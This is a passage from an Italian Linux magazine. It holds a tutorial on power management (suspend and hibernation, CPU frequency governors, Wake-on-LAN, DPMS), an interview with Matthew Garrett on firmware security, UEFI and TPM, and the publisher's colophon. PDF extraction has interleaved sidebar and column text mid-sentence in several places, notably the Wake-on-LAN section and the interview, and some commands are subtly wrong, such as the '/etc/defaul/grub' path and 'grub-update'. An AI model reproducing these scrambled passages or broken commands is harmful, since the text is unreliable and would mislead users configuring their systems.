custom. Nel sistemi non-Ubuntu sono
richieste alcune configurazioni aggiuntive e
dipendono molto dalla distribuzione
utilizzata. Per lo più si tratta di modifiche a
initramfs/initrd, l’imbracatura che Grub
carica per il kernel. TuxOnIce permette anche
di visualizzare delle belle barre di progresso
durante l’ibernazione o il risveglio. Questo
può essere fatto utilizzando i pacchetti
fbsplash e tuxonice-uerui. Permette inoltre
di sospendere/risvegliare processi o di forzare
un riavvio. Il team di TuxOnIce mantiene
anche hibernate-script, un wrapper che offre
facile accesso sia al backend di uswsusp
che al suo. Questo significa che potete
utilizzare una sospensione ibrida, che si
risveglia velocemente dalla RAM se la batteria
regge oppure se non ce la fa, più lentamente
dal disco.

i sei stati di Power Sleep S0-S5, gli stati dei dispositivi,
del processore e delle performance. Questo era molto utile
particolarmente per i portatili (che stavano diventando
sempre più convenienti e trasportabili), permettendo
di aumentare la durata della batteria e ridurre i tempi
di accensione, grazie alla sospensione della RAM e dei
dischi. I nuovi processori hanno portato le innovazioni
di ACPI anche nelle sale server diminuendo i problemi
di temperatura e riducendo le bollette. Sfortunatamente
alcuni bug nei BIOS persistono tutt’ora, soprattutto in
macchine con più di cinque anni di vita, quindi se doveste
avere problemi verificate che non ci sia un aggiornamento
per il vostro BIOS sul sito del produttore della scheda
madre. Se questo non dovesse risolvere il vostro problema
e vi sentite avventurosi, provate a cercare un modo per
riparare le tabelle DSDT buggate. La pagina wiki di Arch
Linux è un buon punto di partenza https://wiki.archlinux.
org/index.php/DSDT, ma dato che la tabella deve essere
inclusa nell’immagine del kernel dovete avere confidenza
con la compilazione del kernel. Anche la documentazione
del kernel offre diverse informazioni utili per debuggare
i problemi di ibernazione e di sospensione (http://bit.ly/
BasicPMDebug). Tutte le funzionalità ACPI sono controllate
dal demone acpid, ma molte sono offerte anche
dall’ambiente desktop o da Systemd. Con quest’ultimo
potete specificare cosa succede quando chiudete il
portatile, premete il pulsante di spegnimento, ecc..
modificando il file /etc/systemd/logind.conf. Le opzioni
più importanti e le relative azioni si spiegano da sole:
HandlePowerKey=poweroff
HandleSuspendKey=suspend
HandleHibernateKey=hibernate
HandleLidSwitch=suspend
HandleLidSwitchDocked=ignore
Ovviamente se volete verificare le cose alla vecchia
maniera avrete bisogno di qualche riga di comando.
In particolare, potete attivare le modifiche scrivendo
direttamente all’interfaccia /sys/power/state.
Per esempio, per mandare il PC in sospensione (S3, STR)
lanciate quanto segue (come root):
# echo mem > /sys/power/state
Oltre a mem, potete utilizzare gli stati leggermente più
onerosi come risorse ma più veloci nel risveglio freeze (S1)
o standby (S2). Utilizzando disk si entra in ibernazione
(S4). Affinché questi comandi funzionino è necessario che
abbiate una partizione di swap sufficientemente grande,
A volte le
impostazioni di
DPMS mostrate
da xset sono
un po’ strane.
In questo caso,
Unity si è preso
carico di gestire
lo schermo
perché tutto il contenuto della RAM viene copiato lì. I dati
verranno compressi, quindi se anche la partizione di swap
è inferiore alla quantità di RAM potrebbe funzionare
comunque. La macchina esegue lo shutdown (S5) una volta
che l’immagine di ibernazione è stata scritta, quindi affinché
al risveglio utilizzi l’immagine creata dobbiamo dire al kernel
dove si trova. Che significa aggiungere un’opzione tipo
resume=/dev/sda2
come parametro del kernel, dove ovviamente sda2 è la
partizione di swap. Potete utilizzare anche il più robusto
(oltre che lungo) UUID per definire la partizione se preferite.
Per eseguire la modifica come root aggiungete l’opzione
GRUB_CMDLINE_LINUX in /etc/defaul/grub ed eseguite
grub-update. Vale la pena dare un’occhiata a pm-utils
che è una raccolta di wrapper per il kernel. Offre diversi
workaround per molte particolarità delle schede madri, oltre
alla possibilità di scaricare i moduli problematici prima
di andare in sospensione. Un piccolo avviso: se si fa un
aggiornamento del kernel e poi si manda in ibernazione la
Tip
macchina, per poi recuperare l’immagine, il nuovo kernel Se vi trovate in
si arrabbierà molto con l’immagine recuperata. Quindi non difficoltà (per
esempio senza
ibernate subito dopo un aggiornamento del kernel.
interfaccia grafica
dopo un risveglio
Chi comanda? dalla RAM),
I processori moderni (ma anche un Athlon XP di 12 anni fa provate a guardare
se avete una scheda madre nForce 2 e un po’ di tempo il pacchetto
uswsusp che
a disposizione) supportano la possibilità di modificare la permette maggiori
frequenza. Di solito questo può essere abilitato dal BIOS. personalizzazione
L’incarnazione Intel di questo è Enhanced Speedstep, del processo di
mentre AMD offre Cool’n’Quiet e PowerNow. L’idea è che, sospensione.
Permette di
quando possibile, il processore venga rallentato e il
modificare le
voltaggio diminuito (in alcuni casi i core vengono spenti impostazioni della
del tutto). Questo significa che la temperatura del sistema scheda grafica pre e
diminuisce, e quindi anche le ventole possono rallentare post risveglio, oltre
e la bolletta dell’energia elettrica diminuisce sensibilmente. a offrire supporto
per immagini di
Il controllo di questi meccanismi è fatto tramite il ibernazioni criptate.
sottosistema CPUFreq, e di solito si imposta di default.

121
Tutorial Risparmio
Varieenergetico
Diversi profili chiamati governor (governatori), sono
disponibili per rispondere a diverse situazioni. Potete
vedere quali sono attivi nel vostro sistema digitando:
$ cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_
governor
Per i sistemi desktop esiste un governor predefinito chiamato
ondemand che di norma è la scelta migliore: mantiene la
frequenza al minimo finché la CPU non viene sovraccaricata,
quindi la alza finché necessario per poi riabbassarla quando
è finito il carico. Il governor è molto reattivo, in grado di
cambiare le frequenza migliaia di volte al secondo, quindi
non noterete alcun ritardo quando avrete bisogno di più
megahertz. Comunque potreste notare alcuni rallentamenti
se avete un carico di lavoro particolarmente vario, per
esempio grossi lavori di compilazione, dove il collo di bottiglia
si sposta velocemente dalla CPU alle operazioni di I/O
sul disco. Gli altri governor sono: performance (mantiene
la CPU alla sua massima frequenza), conservative (modifica
la frequenza lentamente, più ritardi rispetto a ondemand)
e powersave (minor frequenza). Quest’ultima potrebbe
creare qualche problema con carichi di lavoro
particolarmente pesanti ma può tornare utile per far durare
più a lungo la batteria. Il governor attivo può essere cambiato
dall’utente root dentro a /sys, per esempio:
$ sudo -i
# echo performance > /sys/devices/system/cpu/cpu0/
cpufreq/scaling_governor
Esiste anche un altro governor chiamato userspace, che
non è veramente un governor, ma indica che un programma
gestirà le frequenze. Questo programma è cpupower,
che (rimpiazzando il deprecato cpufreqd) ci permette di
impostare una frequenza minima e massima. Normalmente
non è necessario, ma potete usarlo. Per esempio su vecchi
portatili è normale che un carico di lavoro troppo elevato
causi un surriscaldamento facendo sì che il BIOS paralizzi la
CPU per evitare danni. In questi casi può essere utile evitare
che la CPU raggiunga la sua frequenza massima, il che può
essere fatto con un comando simile a:
Ecco un
esempio di report
generato da
powertop in tutto
il suo splendore
122
# cpupower frequency-set -u 1600MHz
Potete controllare le frequenze supportate dalla vostra
CPU semplicemente con:
$ cpupower -c 0 frequency-info
l’opzione -c determina un particolare core della CPU.
È possibile impostare frequenze diverse per i vari core.
Nel caso in cui questo comando ritornasse valori strani,
come per esempio che la vostra CPU può lavorare soltanto
molto più lentamente di quanto fa, potrebbe essere utile
controllare un eventuale aggiornamento del BIOS,
soprattutto su hardware datato. Come detto prima,
i produttori spesso non sono molto bravi a seguire gli
standard, in questo caso si riflette sul fatto che il BIOS
mostra un elenco sbagliato di frequenze. Se non esiste alcun
aggiornamento e vi piace l’idea di avere la vostra CPU che
lavora sempre al massimo della velocità potete sempre
disabilitare lo Speedstep dal BIOS. Se installate il
programma powertop potete vedere per quanto tempo
la CPU è stata utilizzata nelle varie frequenze. Powertop
mostra anche quali programmi hanno generato più risvegli.
Può anche gestire e modificare diverse impostazioni di
risparmio energetico attraverso l’interfaccia /sys. Lanciando
# powertop --html=powerreport.html
si genera un report che mostra queste informazioni.
Il risveglio
Il sistema può essere rianimato dallo stato di sospensione
o ibernazione con un’attività del mouse o della tastiera.
Educando correttamente l’hardware potete anche risvegliare
un computer remoto inviando un pacchetto tramite la rete
LAN. Da notare che può funzionare anche con alcuni tipi di
reti wireless, ma è abbastanza problematico, quindi in questo
articolo ci concentreremo solo sulle reti cablate. La prima
cosa da verificare è che WoL (Wake on Lan) sia abilitato nelle
impostazioni di risparmio energetico del BIOS. Quindi
bisogna installare ethtool e verificare che la propria scheda
(chiamiamola eth0) supporti il WoL:
$ ethtool eth0 | grep Wake
 Risparmio energetico
Efficienza Tutorial
energetica
Supports Wake-on: umbg Esistono molte
Wake-on: b app per il Wake-
La prima riga mostra il tipo di pacchetti ai quali la scheda on-LAN per
praticamente
di rete può rispondere, in questo caso Unicast, Multicast,
tutti i sistemi
Broadcast e maGic packet. Affinché WoL funzioni
operativi,
dobbiamo impostarlo per quest’ultimo. Se non è già così compresi Android
possiamo farlo con: e Ios, ma far
# ethtool -s eth0 wol g funzionare il
Questa impostazione non sopravviverà a un riavvio, quindi tutto tramite
se volete renderla permanente dovete aggiungere questo Internet
comando da qualche parte all’avvio, come script da eseguire dall’esterno
dopo la configurazione di rete o tramite regola udev. della vostra rete
Per udev, create un file /etc/udev/rules.d/50-wol.rules privata non è
un’impresa facile
con questo contenuto:
ACTION==“add”, SUBSYSTEM==“NET”,
KERNEL==“eth0”, RUN+=“/usr/bin/ethtool -s %k wol g”
Avrete bisogno del MAC address della macchina, dato che
i pacchetti magici lavorano al di sotto del livello IP. Si tratta
di un identificatore formato da 12 caratteri esadecimali che
potete scoprire con:
# ip link
Risvegliare una macchina richiede che un’applicazione
WoL sia installata sull’host. Un tool di questo tipo è offerto
dal pacchetto wol ma potete trovare tool anche per
Android e per molti altri sistemi operativi. Con wol
installato e tutto il resto configurato correttamente potete
risvegliare una macchina remota con:
# wol aa:bb:cc:dd:ee:ff
sostituendo i caratteri qui sopra con il MAC address della
macchina. Potete specificare anche l’hostname o l’indirizzo
IP della macchina usando l’opzione -i.

ARP magic FF:FF:FF:FF:FF:FF in questo modo:

Tip
I pacchetti magic, in teoria, possono essere inviati anche # arp -i br0 -s 192.168.1.254 FF:FF:FF:FF:FF:FF I possessori di
attraverso Internet, solitamente sono spediti come e fare il forward del traffico WoL a questo host immaginario. una CPU Intel
moderna (quelle
datagrams UDP alla porta 9, alcuni router comunque, Se riuscite a impostare questo, la macchina può essere con desinenza
hanno difficoltà a gestirli. Inoltrare il traffico della porta UDP accesa da remoto utilizzando l’indirizzo IP esterno Core i3, i5 o i7)
9 all’IP della macchina bersaglio non sarà sufficiente, dato o l’hostname assegnato al router (servizi dinamici di DNS probabilmente
che la nostra macchina non ne sarà influenzata. Invece, come duckdns.org possono essere utili a questo scopo) vorranno dare
un’occhiata al
il router deve essere configurato per inoltrare il traffico e il MAC address della macchina bersaglio:
programma i7z
all’indirizzo di broadcast della rete interna (per esempio: $ wol -p 9 -i INDIRIZZO_IP_O_HOSTNAME che permette
192.168.1.255), e molti dispositivi non lo permettono. aa:bb:cc:dd:ee:ff la manipolazione
Questo problema può essere aggirato se avete un accesso E questo conclude il nostro tour sul risparmio energetico. degli stati avanzati
shell al vostro router, nel caso si utilizzi DD-WRT, Tomato Una volta era un sistema frammentario, pieno di bug chiamati P-states
offerti da questi
o qualcosa di simile. Il trucco sta nell’aggiungere una voce hardware, e per molti versi lo è ancora. Ma per lo più chip.
ARP senza indirizzo IP all’interfaccia, con il MAC address funziona... almeno lo speriamo.

DPMS
Tutto questo bel risparmio di watt è cosa buona
e giusta ma alcune volte c’è la necessità di
avere la propria macchina attiva, ma non il
proprio monitor. La magia che controlla lo stato
di allerta del display si chiama DPMS (Display
Power Management Signalling), invece la
magia che spegne lo schermo proprio quando
lo volete usare è ancora un mistero. Nella
maggior parte dei casi, la gestione del monitor
funziona bene senza bisogno di configurazione
(anche senza un server X), ma non sempre.
Ci sono tre tipi di oscuramento: Sospensione,
Standby e Spegnimento in ordine di consumo
energetico. Alcuni monitor non riconoscono la
differenza tra i primi due. Se state utilizzando
un ambiente desktop completo di tutte le
funzionalità (o anche uno minimale come
il nuovo nato LXQt 0.9), sarete in grado di
manipolare queste impostazioni da interfaccia
grafica, altrimenti potete farlo aggiungendo un
file, diciamo /etc/X11/xorg.conf.d/12-dpms.
conf con al suo interno:
Section “ServerLayout”
Identifier “ServerLayout0”
Option “StandbyTime” “45”
Option “SuspendTime” “55”
Option “OffTime” “60”
EndSection
I timeout sono specificati in minuti. Potete
controllare le vostre impostazioni lanciando xset
q, se non sono come vi aspettate è possibile che
uno screensaver abbia sovrascritto le vostre
impostazioni. xset può gestire anche questo con
un semplice xset s off. Potete usarlo anche per
sperimentare i diversi stati, per esempio:
$ xset dpms force standby

123
 Varie

Attenti al
firmware
Facciamo quattro chiacchiere con il rinomato studioso Matthew
Garrett per parlare della sicurezza dei computer a livello più profondo
124

Matthew Garrett è Principal security
engineer di CoreOS. è uno sviluppatore
sul kernel interessato alla sicurezza
e all’affidabilità della programmazione
e sta risolvendo problemi che nessun
altro ha il coraggio di affrontare.
Ha anche un Dottorato di ricerca (Ph.D.)
in Genetica computazionale.
Linux Security: In che cosa consiste il tuo
lavoro alla CoreOS?
Matthew Garrett: Mi focalizzo sulla
sicurezza delle infrastrutture: lavoro sul
fornire tecnologie e tecniche di basso livello
che servono ad aumentare la protezione
dei singoli contenitori ma anche dell’intera
piattaforma.
LS: I contenitori sono molto di moda:
secondo te la sicurezza è riuscita a restare
al passo con i tempi o ci sono intere nuove
classi di violazioni dei container o infezioni
tra i contenitori?
MG: La sicurezza dei container è una
questione interessante perché, a seconda
della prospettiva da cui consideri il
problema, puoi farti un’idea diversa della
loro affidabilità. Se usi i container come
se fossero macchine virtuali, ti offrono un
minore isolamento. Se però hai un sistema
in cui tutte le applicazioni girerebbero
nello stesso ambiente, spostarle
in contenitori migliora la sicurezza.
Di conseguenza possono essere un
beneficio o una minaccia per la sicurezza
in base a come vengono impiegati.
LS: Siamo ancora in una fase
pionieristica? I container, sotto forma
di chroot e simili, sono in giro da un bel
po’ di tempo, ma attraverso Docker sono
Sicurezza dei sistemi
arrivati a un livello che è davvero dichiaratamente usare l’accesso diretto alla
completamente diverso. memoria per modificare i contenuti della
MG: Il kernel ha continuato a sviluppare RAM del sistema. Sono stati fatti diversi
nuove funzioni basate sui container per esperimenti per dimostrare come si possono
molto tempo. Penso che non sia stato un usare vari dispositivi PCI per modificare
percorso facile arrivare al punto in cui siamo il kernel al runtime. Ci si può proteggere
ora. In diverse release del kernel la maggior da questo rischio usando la IOMMU (I/O
parte dei problemi di sicurezza riguardavano Memory Management Unit) del sistema per
il codice namespace usato come base determinare quali periferiche sono abilitate
per i contenitori. Ora però sta cominciando in scrittura e su quali indirizzi. Non tutti
a stabilizzarsi: siamo arrivati al punto in cui i sistemi, però, hanno le IOMMU e, anche
è piuttosto affidabile. quando ci sono, spesso le distro di Linux non
le attivano. Di conseguenza rimane il rischio
LS: Secondo te, quindi, i contenitori che, se si può caricare del firmware su un
stanno entrando nell’età adulta? dispositivo in condizioni specifiche, anche
MG: Sì, è finito il periodo in cui la gente se il sistema operativo non è stato alterato
sostanzialmente ci giocava. Ci sono e anche nel caso in cui i driver siano
abbastanza persone che esaminano affidabili, comunque quel firmware
seriamente la situazione per riuscire modificato potrebbe raggiungere e alterare
a lavorare bene. una parte del kernel. Così, all’improvviso,
un processo di un utente specifico si mette
LS: Parlaci del tuo intervento a OSCON. a funzionare come se fosse eseguito da root
MG: Ho parlato di che cosa ci servirebbe ed è in grado di fare tutto quello che vuole.
per costruire un computer affidabile.
Con affidabile intendo che il proprietario LS: Wow. La nostra rivista ha un DVD
allegato ogni mese e regolarmente
o l’utente di un sistema sia in grado di fidarsi
che il computer operi nel suo interesse e non riceviamo chiamate e messaggi di lettori
in quello di qualcun altro. Uno degli elementiche si lamentano di UEFI. Proviamo
che si sono scoperti con le divulgazioni a evidenziare che UEFI di per sé non
sulla sorveglianza di massa del 2013 è che è un problema, e neanche Secure Boot,
la National Security Agency statunitense ma che lo è piuttosto il modo in cui
(NSA) aveva sviluppato vari attacchi contro i produttori hanno deciso di blindarli.
il firmware. Per esempio, aveva ottenuto Puoi darci la tua opinione?
accesso a dei sistemi che erano stati spediti MG: Recentemente ho lavorato molto
a degli utenti e aveva modificato il firmware su metodi per rendere più facile la verifica
in modo da poterlo usare per modificare del fatto che il tuo sistema operativo
non sia stato
il pericolo del firmware modificato manomesso.
UEFI Secure
“All’improvviso un processo Boot
naturalmente
di un utente si mette a funzionare per noi
come se fosse eseguito da root” era
preoccupante
perché, all’inizio,
lo stato dei sistemi. In questo modo poteva c’era il rischio che i sistemi fossero venduti
in seguito accedervi per ottenere privilegi senza che gli utenti potessero avere alcun
aggiuntivi, o fargli copiare dei dati, controllo su cosa era considerato sicuro.
o registrare delle password... C’è infatti il rischio che, nel tentativo di
Se poi l’NSA riusciva a recuperare migliorare la sicurezza, riduciamo la libertà
la macchina, poteva estrarne tutti i segreti, dell’utente. Un esempio sarebbe un sistema
anche se i dischi erano crittati. Secure Boot che ti permettesse di avviare
solo immagini autenticate di Ubuntu
LS: Il firmware proprietario, che o Fedora. Probabilmente dal punto di vista
è sostanzialmente quello che impedisce della sicurezza sarebbe un miglioramento,
agli adattatori wireless di funzionare perché l’eventuale pirata dovrebbe avere
appena collegati, tende a portare la chiave di autenticazione per attaccare
un bel po’ di grattacapi agli utenti il computer, ma nel frattempo si sarebbero
Linux. Mi sembra di capire che possa bloccate le libertà dell’utente di alterare
introdurre anche delle vulnerabilità il sistema operativo, di usare il suo codice
per la sicurezza, corretto? o di scegliere il sistema che preferisce.
MG: Le periferiche PCI possono Quello che invece succede è che gli utenti
125
Matthew Garrett
Varie
hanno la libertà di installare le loro chiavi
e fare le loro scelte personali su cosa
utilizzeranno. Se volessi potresti prendere
un sistema Secure Boot e configurarlo in
modo che si rifiuti di avviare Windows e usi
solo Fedora o Ubuntu, o qualunque sia la tua
distro preferita. è un’opzione che ti viene
data ed è molto importante, secondo me:
la libertà infatti non è solo essere in grado
di decidere cosa far girare ma anche quella
di scegliere cosa non usare. Ci ha fatto fare
dei passi avanti a livello di sistema operativo.
Ora è molto più difficile compromettere
i livelli bassi del sistema operativo e poi
di conseguenza minare completamente
la tua abilità di fidarti del tuo sistema
operativo. Ma dobbiamo spingerci oltre.
LS: Ci sono stati casi in cui UEFI è stato
effettivamente aggirato?
MG: Non so se avete avuto modo
di esaminare in dettaglio i contenuti della
fuga di dati di Hacking Team, ma avevano
un modo di utilizzare il loro malware in cui
modificavano il firmware del sistema.
Il loro approccio non era molto sofisticato
dal punto di vista tecnologico: dovevano
avere accesso fisico al sistema per
attaccarlo. Se però estraevano il firmware
significa che avrebbero potuto anche
126
inserirci il loro codice. In questo caso a ogni dispositivi, due fonti indipendenti
avvio il sistema avrebbe in realtà montato di informazione. Sto lavorando su una
un hard drive via NTFS (prendeva come tecnologia per usare i TPM come strumenti
bersaglio solo Windows). Avrebbe montato per crittare il segreto di un dispositivo
una partizione di sistema, copiato il malware di autenticazione a due fattori (2FA). In quel
nel filesystem di Windows, poi lo avrebbe modo, ogni volta che avvii il tuo laptop,
smontato e a ogni avvio di Windows se le misurazioni sono corrette il TPM
e avrebbe automaticamente lanciato decritterà il segreto e potrai usarlo insieme
il malware. Anche se l’utente avesse all’ora della giornata come input per
cancellato completamente i contenuti l’algoritmo TOTP (Time-based One Time
dell’hard drive oppure lo avesse rimosso Password). Comparirà come un numero
e sostituito, l’infezione sarebbe rimasta. a sei cifre: puoi controllare che il numero
Ora abbiamo gli strumenti per rendere sul tuo telefono vi corrisponda e nel caso
più difficile agli hacker questo tipo sarai sicuro che il tuo firmware non è stato
di operazione: i sistemi recenti non alterato. Se non corrispondono, o se
consentono di aggiornare il firmware a meno non ottieni il numero, qualcosa è stato
che non sia autenticato con una chiave modificato ed è meglio attivarsi. Rimane
fidata. Anche questa precauzione, però, può però sempre il problema che, anche
essere aggirata avendo accesso diretto alla se sei sicuro che il tuo firmware non
memoria flash, se qualcuno fosse in grado è stato modificato, come fai a sapere
di accedere alla tua macchina e rimuovere che il produttore non ha introdotto
la memoria flash dalla scheda, oppure deliberatamente una backdoor o non ha
in alcuni casi potrebbero direttamente lasciato una vulnerabilità nella sicurezza
riprogrammare il firmware. che un hacker può sfruttare per aggirare
queste protezioni? è un problema che non
LS: Non ci sono elementi come i chip possiamo realmente risolvere senza il codice
Trusted Platform Module (TPM) fatti sorgente del firmware: dobbiamo avere
proprio per avvisarti quando succede la possibilità di controllare tutto quello
una cosa del genere? che ne fa parte ed esaminare il codice.
MG: Ci sono tecnologie che possono Cosa ancora più importante, dobbiamo
determinare ricostruire il codice e controllare che
se è successo. il risultato corrisponda a quello che c’è
Possiamo usare nel firmware. Non sarà facile farlo accettare
i chip TPM per all’industria ma in conclusione è l’unico
misurare il firmware modo in cui potremo dire che siamo sicuri
quando viene che il nostro computer lavori per noi.
inizializzato: Naturalmente, la situazione peggiorerà
se qualcuno ancora nel corso del tempo. Supponi che
ha modificato possiamo verificare il firmware di sistema.
il firmware Ottimo, ma il firmware dell’hard drive?
la misurazione
risulterà diversa. LS: O le tue chiavette USB?
Se c’è un database MG: Esatto: ci sono moltissimi dispositivi
di tutti i valori che che hanno il loro firmware. Supponiamo
sappiamo essere che qualcuno possa manomettere
sicuri e il tuo non il firmware del tuo hard drive in modo
vi corrisponde, è il che, all’avvio, sostituisca alcuni comandi,
caso di allertarsi. per esempio run SSH. La prima volta che
Il problema è che, lo avvii il disco ti mostra la versione corretta,
se pensi di non scrivi la tua password e va tutto bene.
poterti fidare del tuo Il kernel supporta la misurazione attraverso
firmware, come fai il TPM, in modo che tu possa verificare che
a sapere che l’SSH non sia stato alterato. Il kernel però
il firmware non lo fa solo la prima volta che si esegue
ha alterato il tuo l’SSH, a meno che non sappia che è stato
sistema operativo modificato. Cosa succederebbe se,
in modo, per la prossima volta che esegui l’SSH, il tuo
esempio, da farti hard drive ne attivasse una versione diversa
dare, il valore che registra la tua password? Non potresti
corretto? saperlo: non ci sarebbe alcun modo
Di conseguenza di verificare se sia successo o meno.
ti servono due Ancora una volta, senza il codice sorgente

del firmware degli hard drive e senza
la possibilità di verificare che quel firmware
non sia stato alterato, ci troviamo esposti
a questi rischi. Entro certi limiti è una
situazione ragionevole: bisogna ricordare
però che più miglioramenti riusciamo
ad apportare in termini di essere in possesso
di più codice e di essere in grado di svolgere
più verifiche, più è difficile che possiamo
essere vittime di una qualsiasi forma
di attacco.
LS: Questi sistemi di verifica non possono
essere attaccati e alterati?
Sono davvero affidabili?
MG: Questo è proprio uno dei problemi.
Gli stessi TPM hanno un firmware non Open
Source e ti devi fidare che il TPM si stia
comportando in modo da difendere i tuoi
interessi. Ci sono tantissimi componenti
che devono diventare free prima che
possiamo essere sicuri di cosa succede
nei nostri computer.
LS: Il fatto che alcuni codici firmware non
saranno certo resi pubblici in un prossimo
futuro, quantomeno non senza ciclopici
accordi di non divulgazione,
non mina le basi del tuo lavoro?
MG: Anche se dicessimo “non possiamo
verificare il firmware dell’hard drive, a cosa
serve tutto questo?” dobbiamo considerare
che un eventuale hacker per poterci
attaccare dovrebbe sapere che tipo di hard
drive usiamo e poi trovare una vulnerabilità
per quel dispositivo che gli permetta
di infettarlo. Tutto il processo sarebbe molto
più difficile degli attacchi che si sono svolti
fino a oggi. Più rendi difficile hackerare
il tuo computer, più è probabile che chi vuole
attaccarti ricorra a tecniche più “vecchio
stile”. è anche meno probabile che i criminali
scelgano te come obiettivo per i loro
attacchi. Naturalmente, se dei grandi enti
governativi volessero scoprire cosa stai
Matthew Garrett
Sicurezza dei sistemi
facendo con il tuo computer, è probabile che
riuscirebbero a trovare un modo per farlo.
D’altra parte, però, ogni volta che usano
una di queste vulnerabilità corrono il rischio
di essere scoperti. Al livello più estremo,
la National Security Agency americana può
aver costretto Intel a inserire una backdoor
nelle sue CPU ma in ogni occasione in cui
la NSA sfrutta quella vulnerabilità, ogni volta
che è costretta a usarla perché tutte le altre
falle della sicurezza sono state eliminate,
c’è la possibilità che qualcuno si renda conto
che l’unico modo in cui l’attacco che ha
subìto poteva verificarsi era tramite la CPU.
C’è anche l’eventualità che qualcuno sia
abbastanza paranoico da registrare tutte
le istruzioni mandate alla CPU e sia quindi
in grado di vedere che il risultato non
è corretto, oppure che si accorga che i suoi
numeri casuali sono in qualche modo
deterministici. Se qualcuno scoprisse una
situazione del genere e fosse in grado
di provarla, Intel vedrebbe decimate le sue
possibilità di vendita a livello internazionale
e questo causerebbe al governo degli Stati
Uniti un bel po’ di problemi.
LS: AMD sarebbe invece piuttosto
contenta del risultato...
MG: Sì, AMD potrebbe essere un po’ più attaccate e rese pericolose? Si può
contenta, ammesso che ci sia ancora interferire con questo processo a moltissimi
in questo ipotetico futuro, ma una situazione livelli e ci sono tantissimi modi per farlo.
del genere sarebbe un disastro di enormi è davvero molto difficile organizzare una
proporzioni per tutta l’industria statunitense catena produttiva così open che si possa
della tecnologia. Realisticamente, a meno avere la certezza di produrre esattamente
che tu non sia percepito come un’immediata l’hardware che si era progettato.
minaccia alla sopravvivenza del Paese,
le autorità non correranno un rischio LS: Siamo interessati ai laptop di Novena
del genere per spiarti. Dovresti essere e Purism che mirano a essere tanto open
un leader terroristico perché il governo corra quanto realisticamente possibile ma
un rischio del genere. Più avanti riusciamo mi sembra di capire che ci siano degli
a spingere le misure di sicurezza informatica ostacoli difficili da sormontare…
più la gente può sentirsi protetta, anche MG: Ho avuto modo di parlare con delle
contro la sorveglianza governativa, il che persone coinvolte in entrambi questi progetti
rende i nostri sforzi più che giustificati. e in effetti ci sono ancora delle difficoltà.
Il firmware di sistema di Novena è open
LS: Naturalmente oggi c’è moltissimo e disponibile, ma il system-on-a-chip (SoC)
software Open Source ma la situazione che usa non lo è. Attualmente il SoC ARM
dell’hardware, o del firmware che gira include i core ARM su cui farai di fatto girare
su alcuni dispositivi, è molto diversa? il tuo sistema operativo ma ci sono anche
MG: Sì. La situazione in cui ci troviamo altri core più piccoli, per gestire elementi
è molto lontana da quella ideale. Il software come l’alimentazione, il supporto
è difficile da scrivere, ma una volta che dell’hardware aggiuntivo... Il controller SATA
l’hai creato è facile copiarlo o produrlo. potrebbe essere un altro core ARM, per
Il processo di produzione di nuovo software esempio. Molti di questi elementi avranno
non è un segreto. Se invece volessi realizzare un firmware chiuso integrato sul chip stesso,
una CPU in grado di competere con quelle codice che è pensato per non essere
di Intel, anche se fossi capace di progettarne modificato mai nel corso della vita
una altrettanto valida sotto ogni aspetto, del dispositivo. Anche se ci focalizziamo
la produzione richiederebbe comunque sul firmware di sistema, dobbiamo essere
lo sfruttamento di risorse di altre aziende. in grado di fidarci anche di tutti questi
Come potresti verificare che non siano state componenti. Non c’è altro da fare...
127
 SICURO AL

100%

Amministrazione: testi, fotografie e disegni, anche parziale, è vietato. L’Editore si dichiara

Bimestrale - prezzo di copertina 9,90 €
www.linuxpro.it
Direttore responsabile: Luca Sprea
Traduzione e Localizzazionea cura di: Ventidodici di Andrea Orchesi
redazione@linuxpro.it
Sprea S.p.A.
Socio Unico - direzione e coordinamento di Gestione Editoriale S.p.A.
Presidente: Luca Sprea
Consigliere delegato: Mario Sprea, Claudio Rossi (pubblicità e marketing),
Andrea Franchini (responsabile qualità editoriale)
Coordinamento:Gabriella Re (Foreign Rights) international@sprea.it, Ambra Pa-
lermi (Segreteria Editoriale), Francesca Sigismondi (Ufficio Legale), Tiziana Rosato
(acquisti e produzione), Emanuela Mapelli (Pianificazione Pubblicitaria)
Erika Colombo (responsabile), Irene Citino, Sara Palestra
amministrazione@sprea.it
Servizio qualità edicolanti e DL: Sonia Lancellotti
distribuzione@sprea.it
Segreteria pubblicità: 02 92432244 - pubblicita@sprea.it
Sede Legale: Via Torino, 51 20063 Cernusco Sul Naviglio (Mi) - Italia
PI 12770820152- Iscrizione camera Commercio 00746350149
Per informazioni, potete contattarci allo 02 924321
Contenuti su licenza: “Linux Format” - Future Publishing Limited PLC.
Bath UK
Registrazione testata: Linux Pro, pubblicazione registrata al Tribunale di Milano
il 08.02.2003 con il numero 74.
Distributore per l’Italia e per l’estero:
Press-Di Distribuzione stampa e multimedia s.r.l. - 20090 Segrate
ISSN: 1722-6163
Stampa: Arti Grafiche Boccia S.p.A.- Salerno
Copyright Sprea S.p.A.
La Sprea S.p.A. è titolare esclusiva della testata Linux Pro e di tutti i di-
ritti di pubblicazione e di diffusione in Italia. L’utilizzo da parte di terzi di
pienamente disponibile a valutare - e se del caso regolare - le eventuali
spettanze di terzi per la pubblicazione di immagini di cui non sia stato
eventualmente possibile reperire la fonte. Informativa e Consenso in ma-
teria di trattamento dei dati personali (Codice Privacy d.lgs. 196/03). Nel
vigore del D.Lgs 196/03 il Titolare del trattamento dei dati personali, ex
art. 28 D.Lgs. 196/03, è Sprea S.p.A. (di seguito anche “Sprea”), con sede
legale inVia Torino, 51 Cernusco sul Naviglio (MI). La stessa La informa
che i Suoi dati, eventualmente da Lei trasmessi alla Sprea, verranno rac-
colti, trattati e conservati nel rispetto del decreto legislativo ora enun-
ciato anche per attività connesse all’azienda. La avvisiamo, inoltre, che
i Suoi dati potranno essere comunicati e/o trattati (sempre nel rispetto
della legge), anche all’estero, da società e/o persone che prestano servizi
in favore della Sprea. In ogni momento Lei potrà chiedere la modifica,
la correzione e/o la cancellazione dei Suoi dati ovvero esercitare tutti i
diritti previsti dagli artt. 7 e ss. del D.Lgs. 196/03 mediante comunica-
zione scritta alla Sprea e/o direttamente al personale Incaricato preposto
al trattamento dei dati. La lettura della presente informativa deve in-
tendersi quale presa visione dell’Informativa ex art. 13 D.Lgs. 196/03 e
l’invio dei Suoi dati personali alla Sprea varrà quale consenso espresso al
trattamento dei dati personali secondo quanto sopra specificato. L’invio
di materiale (testi, fotografie, disegni, etc.) alla Sprea S.p.A. deve inten-
dersi quale espressa autorizzazione alla loro libera utilizzazione da parte
di Sprea S.p.A. Per qualsiasi fine e a titolo gratuito, e comunque, a titolo
